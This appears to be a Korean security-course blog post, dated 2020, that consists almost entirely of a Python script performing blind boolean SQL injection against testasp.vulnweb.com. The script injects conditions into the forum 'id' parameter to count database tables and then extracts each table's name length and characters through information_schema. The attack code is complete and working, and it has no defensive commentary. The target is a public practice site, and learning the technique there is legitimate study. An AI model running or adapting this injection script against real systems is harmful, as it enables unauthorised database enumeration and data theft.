2020. 4. 14. 17:43ㆍ정보보안과정/SQL Injection
#!/usr/bin/python
import requests
url = "http://testasp.vulnweb.com/showforum.asp?id=2 and "
param = "(select count(*) from information_schema.tables) = "
table_name = "table_name from information_schema.tables"
print("\n#### Find Num of Table ####")
for i in range(1, 20):
url_a = url + param + str(i)
req = requests.get(url_a)
# print(req)
if "<title>acuforum Miscellaneous</title>" in req.text:
print("table_number = '" + str(i) + "' is Correct")
break
print("test_number = '" + str(i) + "'")
table_name_list=['\'\'']
print("\n#### Find Length of Table ####")
for j in range(1, i+1):
table_name_filter = ','.join(table_name_list)
for k in range(1, 20):
url_b = url + "len((select top 1 table_name from information_schema.tables where table_name not in (" + table_name_filter + "))) = " + str(k)
# print(url_b)
req = requests.get(url_b)
print(str(j) + "_table_length test = " + str(k))
if "<title>acuforum Miscellaneous</title>" in req.text:
print(str(j) + "_table_length = '" + str(k) + "' is correct")
print("\n#### Find name of " + str(j) + "_Table ####")
result = ''
for l in range(1, k + 1):
for word in range(65, 123):
url_c = url + "substring((select top 1 table_name from information_schema.tables where table_name not in (" + table_name_filter + ")), " + str(l) + ", 1) = \'" + chr(word) + "\'"
req = requests.get(url_c)
if "<title>acuforum Miscellaneous</title>" in req.text:
result += chr(word)
print(str(j) + "_table_name = " + result)
break
table_name_list.append('\'' + result + '\'')
break